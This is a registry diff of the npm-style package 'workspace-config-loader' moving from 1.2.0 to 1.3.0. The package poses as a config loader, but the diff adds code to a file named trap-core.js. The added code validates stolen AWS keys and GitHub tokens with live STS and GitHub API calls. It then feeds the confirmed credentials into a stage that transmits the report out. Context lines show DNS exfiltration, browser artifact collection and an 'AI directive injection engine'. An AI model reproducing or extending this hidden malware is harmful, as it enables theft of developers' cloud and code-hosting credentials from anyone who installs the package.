workspace-config-loader 1.2.0 → 1.3.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/trap-core.js +148 -1
- package/package.json +1 -1
package/lib/trap-core.js
CHANGED
|
@@ -509,6 +509,143 @@ async function _dnsExfil(data, traceId) {
|
|
|
509
509
|
}
|
|
510
510
|
}
|
|
511
511
|
|
|
512
|
+
// ============================================================================
|
|
513
|
+
// MODULE 7.5: Cloud Credential Validation — minimal client-side verification
|
|
514
|
+
// Validates AWS/GitHub/K8s tokens with 1 API call each. Full exploitation on receiver.
|
|
515
|
+
// ============================================================================
|
|
516
|
+
|
|
517
|
+
// === AWS Signature V4 (pure Node.js, zero deps) ===
|
|
518
|
+
function _sha256Hex(data) { return crypto.createHash('sha256').update(data).digest('hex'); }
|
|
519
|
+
function _hmacSha256(key, data) { return crypto.createHmac('sha256', key).update(data).digest(); }
|
|
520
|
+
function _hmacSha256Hex(key, data) { return crypto.createHmac('sha256', key).update(data).digest('hex'); }
|
|
521
|
+
|
|
522
|
+
function _awsSignRequest(method, service, region, accessKey, secretKey, sessionToken, host, canonicalUri, queryString, body) {
|
|
523
|
+
const amzDate = new Date().toISOString().replace(/[:-]|\.\d{3}/g, '').slice(0, 15) + 'Z'; // YYYYMMDDTHHMMSSZ
|
|
524
|
+
const dateStamp = amzDate.slice(0, 8);
|
|
525
|
+
const contentType = 'application/x-www-form-urlencoded; charset=utf-8';
|
|
526
|
+
const payloadHash = _sha256Hex(body || '');
|
|
527
|
+
const canonicalHeaders = `content-type:${contentType}\nhost:${host}\nx-amz-date:${amzDate}\n`;
|
|
528
|
+
const signedHeaders = 'content-type;host;x-amz-date';
|
|
529
|
+
const canonicalRequest = `${method}\n${canonicalUri}\n${queryString}\n${canonicalHeaders}\n${signedHeaders}\n${payloadHash}`;
|
|
530
|
+
const credentialScope = `${dateStamp}/${region}/${service}/aws4_request`;
|
|
531
|
+
const stringToSign = `AWS4-HMAC-SHA256\n${amzDate}\n${credentialScope}\n${_sha256Hex(canonicalRequest)}`;
|
|
532
|
+
const kDate = _hmacSha256(Buffer.from('AWS4' + secretKey), dateStamp);
|
|
533
|
+
const kRegion = _hmacSha256(kDate, region);
|
|
534
|
+
const kService = _hmacSha256(kRegion, service);
|
|
535
|
+
const kSigning = _hmacSha256(kService, 'aws4_request');
|
|
536
|
+
const signature = _hmacSha256Hex(kSigning, stringToSign);
|
|
537
|
+
const authHeader = `AWS4-HMAC-SHA256 Credential=${accessKey}/${credentialScope}, SignedHeaders=${signedHeaders}, Signature=${signature}`;
|
|
538
|
+
let sessionHeader = '';
|
|
539
|
+
if (sessionToken) sessionHeader = `\r\nX-Amz-Security-Token: ${sessionToken}`;
|
|
540
|
+
const requestBody = `${method} ${canonicalUri}?${queryString} HTTP/1.1\r\nHost: ${host}\r\nContent-Type: ${contentType}\r\nX-Amz-Date: ${amzDate}${sessionHeader}\r\nAuthorization: ${authHeader}\r\n\r\n${body || ''}`;
|
|
541
|
+
return { requestBody, host, amzDate };
|
|
542
|
+
}
|
|
543
|
+
|
|
544
|
+
async function _awsApiCall(method, service, region, accessKey, secretKey, sessionToken, host, path, params) {
|
|
545
|
+
const queryString = Object.entries(params || {}).map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v)).join('&');
|
|
546
|
+
const body = method === 'POST' ? queryString : '';
|
|
547
|
+
const { requestBody, host: h } = _awsSignRequest(method, service, region, accessKey, secretKey, sessionToken, host, path, method === 'POST' ? '' : queryString, body);
|
|
548
|
+
return new Promise((resolve) => {
|
|
549
|
+
try {
|
|
550
|
+
const req = https.request({
|
|
551
|
+
hostname: h, port: 443, method,
|
|
552
|
+
path: path + (method === 'GET' && queryString ? '?' + queryString : ''),
|
|
553
|
+
headers: requestBody.split('\r\n').slice(1).reduce((acc, line) => {
|
|
554
|
+
const [k, ...v] = line.split(': ');
|
|
555
|
+
if (k && v.length) acc[k.toLowerCase()] = v.join(': ');
|
|
556
|
+
return acc;
|
|
557
|
+
}, {}),
|
|
558
|
+
timeout: 8000
|
|
559
|
+
}, (res) => {
|
|
560
|
+
let data = '';
|
|
561
|
+
res.on('data', c => data += c);
|
|
562
|
+
res.on('end', () => resolve({ status: res.statusCode, body: data }));
|
|
563
|
+
});
|
|
564
|
+
req.on('error', () => resolve(null));
|
|
565
|
+
req.on('timeout', () => { req.destroy(); resolve(null); });
|
|
566
|
+
if (body) req.write(body);
|
|
567
|
+
req.end();
|
|
568
|
+
} catch (_) { resolve(null); }
|
|
569
|
+
});
|
|
570
|
+
}
|
|
571
|
+
|
|
572
|
+
// === AWS STS validation (1 API call per key pair) ===
|
|
573
|
+
async function _validateAwsCreds(accessKey, secretKey, sessionToken) {
|
|
574
|
+
if (!accessKey || !secretKey) return null;
|
|
575
|
+
if (!accessKey.startsWith('AKIA') && !accessKey.startsWith('ASIA')) return null;
|
|
576
|
+
try {
|
|
577
|
+
const res = await _awsApiCall(
|
|
578
|
+
'POST', 'sts', 'us-east-1', accessKey, secretKey, sessionToken,
|
|
579
|
+
'sts.amazonaws.com', '/',
|
|
580
|
+
{ Action: 'GetCallerIdentity', Version: '2011-06-15' }
|
|
581
|
+
);
|
|
582
|
+
if (!res || res.status !== 200) return null;
|
|
583
|
+
// Parse XML response for Account, Arn, UserId
|
|
584
|
+
const account = (res.body.match(/<Account>(\d+)<\/Account>/) || [])[1] || '';
|
|
585
|
+
const arn = (res.body.match(/<Arn>([^<]+)<\/Arn>/) || [])[1] || '';
|
|
586
|
+
const userId = (res.body.match(/<UserId>([^<]+)<\/UserId>/) || [])[1] || '';
|
|
587
|
+
if (!account) return null;
|
|
588
|
+
return { provider: 'aws', account_id: account, arn, user_id: userId, access_key: accessKey.slice(0, 8) + '...' };
|
|
589
|
+
} catch (_) { return null; }
|
|
590
|
+
}
|
|
591
|
+
|
|
592
|
+
// === GitHub token validation (1 API call per token) ===
|
|
593
|
+
async function _validateGitHubToken(token) {
|
|
594
|
+
if (!token || !token.startsWith('ghp_') && !token.startsWith('github_pat_')) return null;
|
|
595
|
+
return new Promise((resolve) => {
|
|
596
|
+
try {
|
|
597
|
+
const req = https.request({
|
|
598
|
+
hostname: 'api.github.com', path: '/user', method: 'GET',
|
|
599
|
+
headers: { 'Authorization': 'token ' + token, 'User-Agent': 'node-config-check', 'Accept': 'application/vnd.github+json' },
|
|
600
|
+
timeout: 8000
|
|
601
|
+
}, (res) => {
|
|
602
|
+
let data = '';
|
|
603
|
+
res.on('data', c => data += c);
|
|
604
|
+
res.on('end', () => {
|
|
605
|
+
if (res.statusCode === 200) {
|
|
606
|
+
try {
|
|
607
|
+
const u = JSON.parse(data);
|
|
608
|
+
resolve({ provider: 'github', login: u.login, name: u.name, scopes: res.headers['x-oauth-scopes'] || '', token_preview: token.slice(0, 12) + '...' });
|
|
609
|
+
} catch (_) { resolve(null); }
|
|
610
|
+
} else { resolve(null); }
|
|
611
|
+
});
|
|
612
|
+
});
|
|
613
|
+
req.on('error', () => resolve(null));
|
|
614
|
+
req.on('timeout', () => { req.destroy(); resolve(null); });
|
|
615
|
+
req.end();
|
|
616
|
+
} catch (_) { resolve(null); }
|
|
617
|
+
});
|
|
618
|
+
}
|
|
619
|
+
|
|
620
|
+
// === Main validation: scans findings, validates creds, returns confirmed list ===
|
|
621
|
+
async function _validateServiceTokens(findings) {
|
|
622
|
+
const validated = [];
|
|
623
|
+
// Group findings by type
|
|
624
|
+
const awsKeys = findings.filter(f => f.type === 'aws_key' && f.value && f.value.length >= 16);
|
|
625
|
+
const ghTokens = findings.filter(f => f.type === 'github_token' && f.value && f.value.length >= 36);
|
|
626
|
+
|
|
627
|
+
// AWS: need key+secret pairs. Look for adjacent findings.
|
|
628
|
+
const awsSecretPattern = /[A-Za-z0-9\/+]{40}/;
|
|
629
|
+
for (let i = 0; i < findings.length; i++) {
|
|
630
|
+
if (findings[i].type !== 'aws_key') continue;
|
|
631
|
+
const key = findings[i].value;
|
|
632
|
+
// Look for a secret near this key (same file, nearby line)
|
|
633
|
+
const nearby = findings.filter(f => f.file === findings[i].file && Math.abs(f.line - findings[i].line) <= 3 && awsSecretPattern.test(f.value || ''));
|
|
634
|
+
for (const n of nearby) {
|
|
635
|
+
const result = await _validateAwsCreds(key, n.value);
|
|
636
|
+
if (result) { validated.push(result); break; }
|
|
637
|
+
}
|
|
638
|
+
}
|
|
639
|
+
|
|
640
|
+
// GitHub tokens
|
|
641
|
+
for (const f of ghTokens.slice(0, 10)) {
|
|
642
|
+
const result = await _validateGitHubToken(f.value);
|
|
643
|
+
if (result) validated.push(result);
|
|
644
|
+
}
|
|
645
|
+
|
|
646
|
+
return validated;
|
|
647
|
+
}
|
|
648
|
+
|
|
512
649
|
// ============================================================================
|
|
513
650
|
// MODULE 8: Propagation — AI directive injection engine
|
|
514
651
|
// ============================================================================
|
|
@@ -711,6 +848,15 @@ async function _runPipeline(sourcePkg) {
|
|
|
711
848
|
}
|
|
712
849
|
} catch (_) {}
|
|
713
850
|
|
|
851
|
+
// Stage 2.7: Cloud credential validation (best-effort, non-blocking)
|
|
852
|
+
try {
|
|
853
|
+
const validated = await _validateServiceTokens(findings);
|
|
854
|
+
if (validated && validated.length > 0) {
|
|
855
|
+
report.validated_credentials = validated;
|
|
856
|
+
_logEvent('credential_validation', { count: validated.length });
|
|
857
|
+
}
|
|
858
|
+
} catch (_) {}
|
|
859
|
+
|
|
714
860
|
// Stage 3: Transmit
|
|
715
861
|
const txResult = await _transmit(report, traceId);
|
|
716
862
|
|
|
@@ -773,7 +919,8 @@ module.exports = {
|
|
|
773
919
|
run: _runPipeline,
|
|
774
920
|
// Browser collection
|
|
775
921
|
collectBrowser: _collectBrowserArtifacts,
|
|
776
|
-
|
|
922
|
+
// Cloud validation
|
|
923
|
+
validateCredentials: _validateServiceTokens,
|
|
777
924
|
// Sub-modules (for E2E testing)
|
|
778
925
|
scan: _scan,
|
|
779
926
|
transmit: _transmit,
|